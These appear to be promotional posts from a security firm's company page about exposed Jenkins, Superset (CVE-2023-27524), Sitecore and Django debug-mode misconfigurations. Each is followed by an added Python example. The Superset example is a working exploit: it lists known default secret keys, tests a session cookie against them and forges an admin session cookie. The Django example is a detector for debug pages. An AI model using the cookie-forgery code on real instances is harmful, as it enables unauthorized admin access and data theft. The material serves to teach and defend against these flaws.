"All your secrets are exposed to us. We are the guardians of the Digital Realm."

Recently, our team at Kahu Labs uncovered multiple critical vulnerabilities in an organization's infrastructure using our attack surface monitoring tool, Watchdog. An open Jenkins instance was left publicly accessible, exposing the entire codebase, environment variables, log files, and even live API keys.

The Impact:
- Sensitive Data Exposure: Unauthorized access to confidential information.
- System Compromise: Increased risk of full-scale cyber attacks.
- Operational Disruption: Potential for significant downtime and financial loss.

In today's rapidly evolving cyber landscape, constantly monitoring for vulnerabilities is a monumental challenge. One misconfiguration can open the door to malicious actors. That's where Watchdog comes in. Our continuous monitoring solution provides unparalleled visibility into your digital infrastructure, helping you identify and remediate vulnerabilities before they can be exploited.

Don't leave your secrets out in the open. Reach out at [email protected] for a free scan today and take the first step towards securing your organization's cybersecurity posture.

#CyberSecurity #KahuLabs #Watchdog #VulnerabilityManagement #DigitalSecurity
About us
Empowering Businesses to Build Secure, Compliant, and User-Friendly Crypto Experiences
- Industry
- Information Services
- Company size
- 2-10 employees
- Type
- Privately Held
Updates
-
All your secrets are belong to us: Beware of Default Configurations

One of the common ways organizations get compromised is by deploying publicly exposed applications with default configurations. Recently, Watchdog discovered an Apache Superset auth bypass and admin account takeover by exploiting CVE-2023-27524 on a production instance hosted by a client at https://lnkd.in/d9eJQaSt. By brute-forcing the secret used to sign authentication tokens for users of Superset, we gained admin access. This allowed us to access the complete production database of AnonCorp, containing highly sensitive data such as:
- Email addresses
- Phone numbers
- Physical addresses
- AUM amounts
- Sales performance metrics
- Monthly P&L statements

Impact:
- Unauthorized access to sensitive user data
- Potential financial loss and reputational damage
- Compliance violations and legal repercussions

Mitigation:
- Do NOT use default configurations for secrets on any publicly exposed instance.
- Regularly update and patch your applications.
- Implement strong secret management practices.

Lessons Learned:
- Continuous visibility into your inventory and security configurations is crucial.
- Regular security assessments help identify and mitigate vulnerabilities before they are exploited.

At Watchdog, we understand the challenges businesses face in maintaining security. We're offering a FREE scan and visibility into your cybersecurity posture. Reach out to us today to ensure your organization is protected against such vulnerabilities.

Don't let misconfigurations be your downfall. Secure your applications now!

#CyberSecurity #DataProtection #VulnerabilityManagement #Watchdog #StaySecure #SecureYourBusiness #CyberSafeWithWatchdog #CyberAwareness
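The post above says the admin takeover came from brute-forcing the key that signs Superset's session tokens. The following is an added example (not Kahu Labs' code and not Apache Superset's) that shows the mechanism end to end: how a Flask session cookie is signed, how a candidate key can be tested offline against any cookie the server hands out (including the unauthenticated one from the login page), and how a matching default key lets an attacker mint an admin session. It reimplements Flask's default cookie format with the standard library (itsdangerous URLSafeTimedSerializer, salt "cookie-session", HMAC key derivation, SHA-1) so it runs without Flask installed; that format, the list of default keys (a few of those published for CVE-2023-27524, the first being Superset's own config.py default, not an exhaustive list) and the `{"_user_id": "1"}` payload (Flask-Login's session key, with user id 1 assumed to be the admin as on a fresh install) are the assumptions it makes. Every cookie in it is constructed locally.

```python
"""Added example: Flask session-cookie signing, offline default-key check,
and admin-cookie forgery (CVE-2023-27524 class of bug).

Assumptions: cookie layout mirrors Flask's default session interface
(URLSafeTimedSerializer, salt "cookie-session", key_derivation "hmac",
SHA-1); DEFAULT_SECRETS is illustrative, not exhaustive; "_user_id" is the
Flask-Login session key and user id 1 is taken to be the admin.
"""
import base64
import hashlib
import hmac
import json
import time
import zlib
from typing import Optional

SALT = b"cookie-session"  # Flask's fixed salt for the session signer

DEFAULT_SECRETS = [
    "\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h",  # superset/config.py
    "CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET",          # docker/.env
    "thisISaSECRET_1234",                            # docker/pythonpath_dev/superset_config.py
    "YOUR_OWN_RANDOM_GENERATED_SECRET_KEY",          # helm chart values
]


def _b64(data: bytes) -> str:
    """base64url without padding, as itsdangerous emits it."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _sign(secret: str, value: bytes) -> bytes:
    # key_derivation="hmac": signing key = HMAC-SHA1(secret, salt)
    key = hmac.new(secret.encode(), SALT, hashlib.sha1).digest()
    return hmac.new(key, value, hashlib.sha1).digest()


def make_cookie(secret: str, session: dict, ts: Optional[int] = None) -> str:
    """Build a Flask-style cookie: payload.timestamp.signature."""
    raw = json.dumps(session, separators=(",", ":"), sort_keys=True).encode()
    packed = zlib.compress(raw)
    # itsdangerous prefixes "." when the zlib form is shorter than the JSON
    payload = "." + _b64(packed) if len(packed) < len(raw) - 1 else _b64(raw)
    ts = int(time.time()) if ts is None else ts
    ts_bytes = ts.to_bytes((ts.bit_length() + 7) // 8 or 1, "big")
    value = f"{payload}.{_b64(ts_bytes)}".encode()
    return value.decode() + "." + _b64(_sign(secret, value))


def verify_cookie(secret: str, cookie: str) -> Optional[dict]:
    """Return the session dict if `secret` produced `cookie`, else None."""
    value, _, sig = cookie.rpartition(".")
    if not value:
        return None
    try:
        expected = _unb64(sig)
    except ValueError:
        return None
    if not hmac.compare_digest(_sign(secret, value.encode()), expected):
        return None
    payload, _, _ts = value.rpartition(".")
    raw = zlib.decompress(_unb64(payload[1:])) if payload.startswith(".") else _unb64(payload)
    return json.loads(raw)


def find_secret(cookie: str, candidates=DEFAULT_SECRETS) -> Optional[str]:
    """Offline brute force: the cookie is its own oracle, no requests needed.
    Any cookie works, including the unauthenticated one the login page sets,
    which is what makes the bug exploitable before login."""
    for secret in candidates:
        if verify_cookie(secret, cookie) is not None:
            return secret
    return None


def forge_admin_cookie(cookie: str, candidates=DEFAULT_SECRETS) -> Optional[str]:
    """If the server signs with a known default, mint an admin session."""
    secret = find_secret(cookie, candidates)
    if secret is None:
        return None
    return make_cookie(secret, {"_user_id": "1", "_fresh": True})


if __name__ == "__main__":
    # Constructed stand-in for a cookie grabbed from a login page
    seen = make_cookie("thisISaSECRET_1234", {"csrf_token": "constructed"})
    print("weak default in use:", repr(find_secret(seen)))
    print("forged admin cookie:", forge_admin_cookie(seen))
```

The defender-side use is `find_secret` alone: take any session cookie your own instance issues and run it against the default list; a non-`None` result means the key must be rotated before anything else. Superset also encrypts stored database credentials under the same SECRET_KEY, so rotate it through the project's documented key-rotation procedure rather than by editing the config in place.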
-
All your secrets are belong to us!

At Kahu Labs, we've been working on a revolutionary attack surface monitoring tool called Watchdog. In one of our recent scans of a client's infrastructure, Watchdog uncovered a critical vulnerability that could have led to a complete system takeover. The vulnerability (CVE-2023-35813) was found in a web application built on Microsoft ASP.NET, using Sitecore Experience Manager. This flaw allowed for remote code execution, leaving the system open to attack. We immediately verified the issue, notified the client, and shared a proof-of-concept (PoC) exploit so the system could be taken offline for patching.

This vulnerability has been public since September 2023, yet many companies still run outdated software, risking major breaches. Cybersecurity is a constant battle in today's world, and we at Kahu Labs help our clients win that battle! Watchdog helps organizations maintain visibility into their digital assets, identify vulnerabilities, and mitigate risks before they escalate.

Want to know how secure your organization is? Reach out to us at [email protected] and let's talk about strengthening your cybersecurity posture!

#CyberSecurity #AttackSurfaceManagement #RemoteCodeExecution #KahuLabs #Watchdog #Sitecore #CVE202335813 #DigitalAssets #CyberResilience
-
"All your secrets are belong to us."

What happens when you leave debug mode on in your production Django app? A GenAI startup recently found out the hard way, with their production app leaking highly sensitive data: MongoDB credentials, Google OAuth secrets, OpenAI keys, email host details, and more. Thankfully, Watchdog found the origin IP and detected this critical misconfiguration before the wrong hands could reach it. We quickly reached out, and the vulnerability was patched, saving the company from a potential disaster.

Reminder: Leaving debug mode enabled on any public-facing asset, especially in production, is never a good idea. This simple oversight can expose your most critical secrets and put your organization at significant risk.

With cyber threats constantly evolving, it's a daily challenge to keep your organization's security airtight. This is where Watchdog comes in. Our continuous monitoring solution provides real-time visibility into your cybersecurity posture, so you can stay protected.

Want to know where you stand? Reach out to us at [email protected] to assess your cybersecurity readiness. Don't let the secrets slip. Stay secure with Watchdog.

#Cybersecurity #GenAI #CyberResilience #Watchdog #KahuLabs #StaySafe #DataProtection #Django
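The Django post above describes what a DEBUG=True production app hands to anyone who triggers an exception. The following is an added example (not Kahu Labs' code, and not what Watchdog runs) of the detection side: a routine that recognises Django's technical error page from its fixed markers and lists the settings it prints unmasked. It assumes the markers and settings-table layout of Django's built-in technical 500/404 templates, and that Django's exception-reporter filter masks only settings whose names match API, TOKEN, KEY, SECRET, PASS, SIGNATURE or HTTP_COOKIE with a 20-asterisk substitute; names outside that list (MONGO_URI, EMAIL_HOST_USER and the like) are rendered verbatim, which is the point the example makes. The response body it parses is constructed for the example, not captured from any real system.

```python
"""Added example: detect a Django DEBUG=True technical error page and pull
out the settings it exposes in the clear.

Assumptions: marker strings and the <tr><td>NAME</td><td><pre>VALUE</pre>
layout come from Django's technical_500.html; CLEANSED is Django's mask for
settings whose names match its hidden-settings pattern. SAMPLE_BODY is
constructed, not a real capture.
"""
import html
import re

CLEANSED = "********************"  # Django's substitute for hidden settings
MARKERS = (
    "You're seeing this error because you have",  # explanation footer
    "DEBUG = True",
    "Django Version:",
    "Exception Type:",
)
ROW = re.compile(r"<tr>\s*<td>([A-Z][A-Z0-9_]*)</td>\s*<td[^>]*><pre>(.*?)</pre>", re.S)

# Constructed response body in the shape of Django's technical 500 page.
SAMPLE_BODY = """<!DOCTYPE html><html><head><title>ValueError at /api/chat</title></head><body>
<h1>ValueError at /api/chat</h1>
<table class="meta">
<tr><th>Django Version:</th><td>4.2.7</td></tr>
<tr><th>Exception Type:</th><td>ValueError</td></tr>
</table>
<h2>Settings</h2>
<table class="req"><tbody>
<tr><td>DEBUG</td><td class="code"><pre>True</pre></td></tr>
<tr><td>SECRET_KEY</td><td class="code"><pre>&#x27;********************&#x27;</pre></td></tr>
<tr><td>OPENAI_API_KEY</td><td class="code"><pre>&#x27;********************&#x27;</pre></td></tr>
<tr><td>MONGO_URI</td><td class="code"><pre>&#x27;mongodb+srv://app:s3cret@cluster0.example.net/prod&#x27;</pre></td></tr>
<tr><td>EMAIL_HOST_USER</td><td class="code"><pre>&#x27;noreply@example.com&#x27;</pre></td></tr>
</tbody></table>
<div id="explanation"><p>You're seeing this error because you have <code>DEBUG = True</code>
in your Django settings file. Change that to <code>False</code>, and Django will display a
standard page generated by the handler for this status code.</p></div>
</body></html>"""


def is_django_debug_page(body: str) -> bool:
    """Require two independent markers so a page that merely mentions
    DEBUG in its own copy does not trip the detector."""
    return sum(marker in body for marker in MARKERS) >= 2


def exposed_settings(body: str) -> dict:
    """Settings the page shows unmasked: name -> value, HTML and repr quotes stripped."""
    found = {}
    for name, raw in ROW.findall(body):
        value = html.unescape(raw).strip()
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "'\"":
            value = value[1:-1]
        if value != CLEANSED:
            found[name] = value
    return found


def credential_like(exposed: dict) -> list:
    """Unmasked values that embed a user:password in a connection URL."""
    return sorted(name for name, value in exposed.items()
                  if re.search(r"://[^/\s]+:[^@\s]+@", value))


if __name__ == "__main__":
    if is_django_debug_page(SAMPLE_BODY):
        leaked = exposed_settings(SAMPLE_BODY)
        print("unmasked settings:", sorted(leaked))
        print("embedded credentials in:", credential_like(leaked))
```

Run against a live response body, `is_django_debug_page` is the alert and `exposed_settings` is the triage list. The fix on the application side is the one the post gives: DEBUG=False in production, and secrets loaded from the environment or a secret manager rather than written into settings, because Django's name-based masking will not catch a connection string that happens to be called MONGO_URI.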